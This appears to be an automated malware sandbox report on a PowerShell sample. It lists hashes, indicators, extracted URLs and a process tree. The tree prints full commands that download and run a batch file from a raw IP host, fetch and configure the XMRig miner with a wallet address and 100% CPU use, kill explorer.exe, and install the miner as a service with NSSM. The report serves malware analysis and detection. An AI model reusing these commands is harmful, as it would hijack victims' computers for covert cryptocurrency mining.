Analysis
-
max time kernel
1200s -
max time network
1190s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
05-07-2024 07:05
Static task
static1
Behavioral task
behavioral1
Sample
run.ps1
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
run.ps1
Resource
win10v2004-20240508-en
General
-
Target
run.ps1
-
Size
148B
-
MD5
ddb62c4ea4689b1f655b79623f339bea
-
SHA1
073307523d294426635cf5a29f76bcc1a1885dd8
-
SHA256
6341b0a8cac2c02b00e1de582e4c5f0ae1ac6fbb15125e8397f691e1ef502de2
-
SHA512
9a0482ed71309780d7e21ef7d21701ea4b96ab07fc9ddff30cb5ae2915296b44e821672680652a4cc77e24470f2a8012578f70dea266ac921a8e958943050dc2
Malware Config
Extracted
http://185.254.97.190:2024/test.txt
Extracted
https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip
Extracted
https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip
Signatures
-
XMRig Miner payload 64 IoCs
resource yara_rule behavioral1/files/0x000700000001ac5a-179.dat family_xmrig behavioral1/files/0x000700000001ac5a-179.dat xmrig behavioral1/memory/4652-182-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/3360-464-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/3360-465-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/3360-466-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/3360-467-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/3360-468-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/3360-469-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/3360-470-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/3360-471-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/3360-472-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/3360-473-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/3360-474-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/3360-475-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/3360-476-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/3360-477-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/3360-478-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/3360-479-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/3360-480-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/3360-481-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/3360-482-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/3360-483-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/3360-484-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/3360-485-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/3360-486-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/3360-487-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/3360-488-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/3360-489-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/3360-490-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/3360-491-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/3360-492-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/3360-493-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/3360-494-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/3360-495-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/3360-496-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/3360-497-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/3360-498-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/3360-499-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/3360-500-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/3360-501-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/3360-502-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/3360-504-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/3360-505-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/3360-506-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/3360-507-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/3360-508-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/3360-509-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/3360-510-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/3360-511-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/3360-512-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/3360-513-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/3360-514-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/3360-515-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/3360-516-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/3360-517-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/3360-518-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/3360-519-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/3360-520-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/3360-521-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/3360-522-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/3360-523-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/3360-524-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral1/memory/3360-525-0x0000000000400000-0x000000000102B000-memory.dmp xmrig -
Blocklisted process makes network request 4 IoCs
flow pid Process 2 4632 powershell.exe 4 4028 powershell.exe 6 2384 powershell.exe 13 4468 powershell.exe -
Executes dropped EXE 9 IoCs
pid Process 4652 xmrig.exe 5048 nssm.exe 208 nssm.exe 3876 nssm.exe 4624 nssm.exe 2920 nssm.exe 3540 nssm.exe 3908 nssm.exe 3360 xmrig.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 5 raw.githubusercontent.com 6 raw.githubusercontent.com 13 raw.githubusercontent.com -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4760 sc.exe 2140 sc.exe 2460 sc.exe 700 sc.exe -
pid Process 4632 powershell.exe 2384 powershell.exe 2636 powershell.exe 2176 powershell.exe 1676 powershell.exe 4036 powershell.exe 4468 powershell.exe 4028 powershell.exe 4276 powershell.exe 4208 powershell.exe 2376 powershell.exe 192 powershell.exe 4760 powershell.exe 3960 powershell.exe -
Delays execution with timeout.exe 64 IoCs
pid Process 1352 Process not Found 2692 Process not Found 2416 Process not Found 992 Process not Found 2036 Process not Found 4964 timeout.exe 2916 timeout.exe 3524 timeout.exe 4480 Process not Found 3816 timeout.exe 1304 timeout.exe 4280 timeout.exe 3632 timeout.exe 4608 timeout.exe 4836 Process not Found 2372 Process not Found 2868 timeout.exe 1108 timeout.exe 4172 timeout.exe 3508 timeout.exe 204 Process not Found 164 Process not Found 768 timeout.exe 3164 timeout.exe 912 timeout.exe 4224 timeout.exe 2380 Process not Found 200 timeout.exe 3948 timeout.exe 2868 timeout.exe 3516 timeout.exe 2832 timeout.exe 2140 Process not Found 4892 Process not Found 3536 timeout.exe 3396 timeout.exe 4672 Process not Found 1440 timeout.exe 3388 timeout.exe 3920 Process not Found 652 timeout.exe 2432 Process not Found 4996 timeout.exe 924 timeout.exe 3540 timeout.exe 2588 Process not Found 2076 Process not Found 4196 timeout.exe 3232 timeout.exe 4084 timeout.exe 3500 timeout.exe 1352 timeout.exe 4336 Process not Found 192 timeout.exe 3944 timeout.exe 1884 timeout.exe 3232 timeout.exe 2844 Process not Found 920 timeout.exe 4652 timeout.exe 900 timeout.exe 3320 Process not Found 3956 Process not Found 604 timeout.exe -
Kills process with taskkill 2 IoCs
pid Process 3500 taskkill.exe 1668 taskkill.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 42 IoCs
pid Process 4632 powershell.exe 4632 powershell.exe 4632 powershell.exe 4028 powershell.exe 4028 powershell.exe 4028 powershell.exe 2384 powershell.exe 2384 powershell.exe 2384 powershell.exe 4276 powershell.exe 4276 powershell.exe 4276 powershell.exe 2636 powershell.exe 2636 powershell.exe 2636 powershell.exe 192 powershell.exe 192 powershell.exe 192 powershell.exe 2176 powershell.exe 2176 powershell.exe 2176 powershell.exe 1676 powershell.exe 1676 powershell.exe 1676 powershell.exe 4036 powershell.exe 4036 powershell.exe 4036 powershell.exe 4760 powershell.exe 4760 powershell.exe 4760 powershell.exe 4208 powershell.exe 4208 powershell.exe 4208 powershell.exe 2376 powershell.exe 2376 powershell.exe 2376 powershell.exe 4468 powershell.exe 4468 powershell.exe 4468 powershell.exe 3960 powershell.exe 3960 powershell.exe 3960 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4632 powershell.exe Token: SeDebugPrivilege 3500 taskkill.exe Token: SeDebugPrivilege 4028 powershell.exe Token: SeDebugPrivilege 1668 taskkill.exe Token: SeDebugPrivilege 2384 powershell.exe Token: SeDebugPrivilege 4276 powershell.exe Token: SeDebugPrivilege 2636 powershell.exe Token: SeDebugPrivilege 192 powershell.exe Token: SeDebugPrivilege 2176 powershell.exe Token: SeDebugPrivilege 1676 powershell.exe Token: SeDebugPrivilege 4036 powershell.exe Token: SeDebugPrivilege 4760 powershell.exe Token: SeDebugPrivilege 4208 powershell.exe Token: SeDebugPrivilege 2376 powershell.exe Token: SeDebugPrivilege 4468 powershell.exe Token: SeDebugPrivilege 3960 powershell.exe Token: SeLockMemoryPrivilege 3360 xmrig.exe Token: SeIncreaseQuotaPrivilege 4116 WMIC.exe Token: SeSecurityPrivilege 4116 WMIC.exe Token: SeTakeOwnershipPrivilege 4116 WMIC.exe Token: SeLoadDriverPrivilege 4116 WMIC.exe Token: SeSystemProfilePrivilege 4116 WMIC.exe Token: SeSystemtimePrivilege 4116 WMIC.exe Token: SeProfSingleProcessPrivilege 4116 WMIC.exe Token: SeIncBasePriorityPrivilege 4116 WMIC.exe Token: SeCreatePagefilePrivilege 4116 WMIC.exe Token: SeBackupPrivilege 4116 WMIC.exe Token: SeRestorePrivilege 4116 WMIC.exe Token: SeShutdownPrivilege 4116 WMIC.exe Token: SeDebugPrivilege 4116 WMIC.exe Token: SeSystemEnvironmentPrivilege 4116 WMIC.exe Token: SeRemoteShutdownPrivilege 4116 WMIC.exe Token: SeUndockPrivilege 4116 WMIC.exe Token: SeManageVolumePrivilege 4116 WMIC.exe Token: 33 4116 WMIC.exe Token: 34 4116 WMIC.exe Token: 35 4116 WMIC.exe Token: 36 4116 WMIC.exe Token: SeIncreaseQuotaPrivilege 4116 WMIC.exe Token: SeSecurityPrivilege 4116 WMIC.exe Token: SeTakeOwnershipPrivilege 4116 WMIC.exe Token: SeLoadDriverPrivilege 4116 WMIC.exe Token: SeSystemProfilePrivilege 4116 WMIC.exe Token: SeSystemtimePrivilege 4116 WMIC.exe Token: SeProfSingleProcessPrivilege 4116 WMIC.exe Token: SeIncBasePriorityPrivilege 4116 WMIC.exe Token: SeCreatePagefilePrivilege 4116 WMIC.exe Token: SeBackupPrivilege 4116 WMIC.exe Token: SeRestorePrivilege 4116 WMIC.exe Token: SeShutdownPrivilege 4116 WMIC.exe Token: SeDebugPrivilege 4116 WMIC.exe Token: SeSystemEnvironmentPrivilege 4116 WMIC.exe Token: SeRemoteShutdownPrivilege 4116 WMIC.exe Token: SeUndockPrivilege 4116 WMIC.exe Token: SeManageVolumePrivilege 4116 WMIC.exe Token: 33 4116 WMIC.exe Token: 34 4116 WMIC.exe Token: 35 4116 WMIC.exe Token: 36 4116 WMIC.exe Token: SeIncreaseQuotaPrivilege 5060 WMIC.exe Token: SeSecurityPrivilege 5060 WMIC.exe Token: SeTakeOwnershipPrivilege 5060 WMIC.exe Token: SeLoadDriverPrivilege 5060 WMIC.exe Token: SeSystemProfilePrivilege 5060 WMIC.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 3360 xmrig.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4632 wrote to memory of 2352 4632 powershell.exe 75 PID 4632 wrote to memory of 2352 4632 powershell.exe 75 PID 2352 wrote to memory of 3500 2352 cmd.exe 77 PID 2352 wrote to memory of 3500 2352 cmd.exe 77 PID 2352 wrote to memory of 4028 2352 cmd.exe 79 PID 2352 wrote to memory of 4028 2352 cmd.exe 79 PID 4028 wrote to memory of 2268 4028 powershell.exe 80 PID 4028 wrote to memory of 2268 4028 powershell.exe 80 PID 2268 wrote to memory of 1288 2268 cmd.exe 81 PID 2268 wrote to memory of 1288 2268 cmd.exe 81 PID 1288 wrote to memory of 4112 1288 net.exe 82 PID 1288 wrote to memory of 4112 1288 net.exe 82 PID 2268 wrote to memory of 3524 2268 cmd.exe 83 PID 2268 wrote to memory of 3524 2268 cmd.exe 83 PID 2268 wrote to memory of 4564 2268 cmd.exe 84 PID 2268 wrote to memory of 4564 2268 cmd.exe 84 PID 2268 wrote to memory of 2988 2268 cmd.exe 85 PID 2268 wrote to memory of 2988 2268 cmd.exe 85 PID 2268 wrote to memory of 3328 2268 cmd.exe 86 PID 2268 wrote to memory of 3328 2268 cmd.exe 86 PID 2268 wrote to memory of 4156 2268 cmd.exe 87 PID 2268 wrote to memory of 4156 2268 cmd.exe 87 PID 2268 wrote to memory of 4760 2268 cmd.exe 88 PID 2268 wrote to memory of 4760 2268 cmd.exe 88 PID 2268 wrote to memory of 2140 2268 cmd.exe 89 PID 2268 wrote to memory of 2140 2268 cmd.exe 89 PID 2268 wrote to memory of 1668 2268 cmd.exe 90 PID 2268 wrote to memory of 1668 2268 cmd.exe 90 PID 2268 wrote to memory of 2384 2268 cmd.exe 91 PID 2268 wrote to memory of 2384 2268 cmd.exe 91 PID 2268 wrote to memory of 4276 2268 cmd.exe 92 PID 2268 wrote to memory of 4276 2268 cmd.exe 92 PID 2268 wrote to memory of 2636 2268 cmd.exe 93 PID 2268 wrote to memory of 2636 2268 cmd.exe 93 PID 2268 wrote to memory of 4652 2268 cmd.exe 94 PID 2268 wrote to memory of 4652 2268 cmd.exe 94 PID 2268 wrote to memory of 1476 2268 cmd.exe 95 PID 2268 wrote to memory of 1476 2268 cmd.exe 95 PID 1476 wrote to memory of 192 1476 cmd.exe 96 PID 1476 wrote to memory of 192 1476 cmd.exe 96 PID 192 wrote to memory of 1592 192 powershell.exe 97 PID 192 wrote to memory of 1592 192 powershell.exe 97 PID 2268 wrote to memory of 2176 2268 cmd.exe 98 PID 2268 wrote to memory of 2176 2268 cmd.exe 98 PID 2268 wrote to memory of 1676 2268 cmd.exe 99 PID 2268 wrote to memory of 1676 2268 cmd.exe 99 PID 2268 wrote to memory of 4036 2268 cmd.exe 100 PID 2268 wrote to memory of 4036 2268 cmd.exe 100 PID 2268 wrote to memory of 4760 2268 cmd.exe 101 PID 2268 wrote to memory of 4760 2268 cmd.exe 101 PID 2268 wrote to memory of 4208 2268 cmd.exe 102 PID 2268 wrote to memory of 4208 2268 cmd.exe 102 PID 2268 wrote to memory of 2376 2268 cmd.exe 103 PID 2268 wrote to memory of 2376 2268 cmd.exe 103 PID 2268 wrote to memory of 4468 2268 cmd.exe 104 PID 2268 wrote to memory of 4468 2268 cmd.exe 104 PID 2268 wrote to memory of 3960 2268 cmd.exe 105 PID 2268 wrote to memory of 3960 2268 cmd.exe 105 PID 2268 wrote to memory of 2460 2268 cmd.exe 106 PID 2268 wrote to memory of 2460 2268 cmd.exe 106 PID 2268 wrote to memory of 700 2268 cmd.exe 107 PID 2268 wrote to memory of 700 2268 cmd.exe 107 PID 2268 wrote to memory of 5048 2268 cmd.exe 108 PID 2268 wrote to memory of 5048 2268 cmd.exe 108
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\run.ps11⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4632 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\script_e39ec5d4.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:2352 -
C:\Windows\system32\taskkill.exetaskkill /f /im explorer.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3500
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('http://185.254.97.190:2024/test.txt', $tempfile); & $tempfile 497hJCXeEYxAcPk3Wpri7rdhMtcjDZqtZfNunptFjH22LTQkWxGqDKQHSeeqCmyoUigwog52521qcNcCsx4zy9ZC7fogkNK; Remove-Item -Force $tempfile"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4028 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp7CB2.tmp.bat" 497hJCXeEYxAcPk3Wpri7rdhMtcjDZqtZfNunptFjH22LTQkWxGqDKQHSeeqCmyoUigwog52521qcNcCsx4zy9ZC7fogkNK"4⤵
- Suspicious use of WriteProcessMemory
PID:2268 -
C:\Windows\system32\net.exenet session5⤵
- Suspicious use of WriteProcessMemory
PID:1288 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session6⤵PID:4112
-
-
-
C:\Windows\system32\where.exewhere powershell5⤵PID:3524
-
-
C:\Windows\system32\where.exewhere find5⤵PID:4564
-
-
C:\Windows\system32\where.exewhere findstr5⤵PID:2988
-
-
C:\Windows\system32\where.exewhere tasklist5⤵PID:3328
-
-
C:\Windows\system32\where.exewhere sc5⤵PID:4156
-
-
C:\Windows\system32\sc.exesc stop moneroocean_miner5⤵
- Launches sc.exe
PID:4760
-
-
C:\Windows\system32\sc.exesc delete moneroocean_miner5⤵
- Launches sc.exe
PID:2140
-
-
C:\Windows\system32\taskkill.exetaskkill /f /t /im xmrig.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1668
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip', 'C:\Users\Admin\xmrig.zip')"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2384
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\xmrig.zip', 'C:\Users\Admin\moneroocean')"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4276
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"donate-level\": *\d*,', '\"donate-level\": 1,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2636
-
-
C:\Users\Admin\moneroocean\xmrig.exe"C:\Users\Admin\moneroocean\xmrig.exe" --help5⤵
- Executes dropped EXE
PID:4652
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"5⤵
- Suspicious use of WriteProcessMemory
PID:1476 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:192 -
C:\Windows\system32\HOSTNAME.EXE"C:\Windows\system32\HOSTNAME.EXE"7⤵PID:1592
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"url\": *\".*\",', '\"url\": \"gulf.moneroocean.stream:10004 \",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2176
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"user\": *\".*\",', '\"user\": \"497hJCXeEYxAcPk3Wpri7rdhMtcjDZqtZfNunptFjH22LTQkWxGqDKQHSeeqCmyoUigwog52521qcNcCsx4zy9ZC7fogkNK\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1676
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"pass\": *\".*\",', '\"pass\": \"Fcxhtlhl\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4036
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"max-cpu-usage\": *\d*,', '\"max-cpu-usage\": 100,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4760
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"log-file\": *null,', '\"log-file\": \"C:\\Users\\Admin\\moneroocean\\xmrig.log\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4208
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config_background.json' | %{$_ -replace '\"background\": *false,', '\"background\": true,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config_background.json'"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2376
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip', 'C:\Users\Admin\nssm.zip')"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4468
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\nssm.zip', 'C:\Users\Admin\moneroocean')"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3960
-
-
C:\Windows\system32\sc.exesc stop moneroocean_miner5⤵
- Launches sc.exe
PID:2460
-
-
C:\Windows\system32\sc.exesc delete moneroocean_miner5⤵
- Launches sc.exe
PID:700
-
-
C:\Users\Admin\moneroocean\nssm.exe"C:\Users\Admin\moneroocean\nssm.exe" install moneroocean_miner "C:\Users\Admin\moneroocean\xmrig.exe"5⤵
- Executes dropped EXE
PID:5048
-
-
C:\Users\Admin\moneroocean\nssm.exe"C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppDirectory "C:\Users\Admin\moneroocean"5⤵
- Executes dropped EXE
PID:208
-
-
C:\Users\Admin\moneroocean\nssm.exe"C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppPriority BELOW_NORMAL_PRIORITY_CLASS5⤵
- Executes dropped EXE
PID:3876
-
-
C:\Users\Admin\moneroocean\nssm.exe"C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStdout "C:\Users\Admin\moneroocean\stdout"5⤵
- Executes dropped EXE
PID:4624
-
-
C:\Users\Admin\moneroocean\nssm.exe"C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStderr "C:\Users\Admin\moneroocean\stderr"5⤵
- Executes dropped EXE
PID:2920
-
-
C:\Users\Admin\moneroocean\nssm.exe"C:\Users\Admin\moneroocean\nssm.exe" start moneroocean_miner5⤵
- Executes dropped EXE
PID:3540
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3564
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4116
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4676
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3400
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵
- Suspicious use of AdjustPrivilegeToken
PID:5060
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1576
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2660
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4008
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:2868
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4264
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4704
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4408
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1668
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1060
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3508
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4760
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3044
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1104
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:920
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1056
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4740
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4124
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2648
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:5076
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4660
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4208
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1936
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1100
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1068
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3696
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3436
-
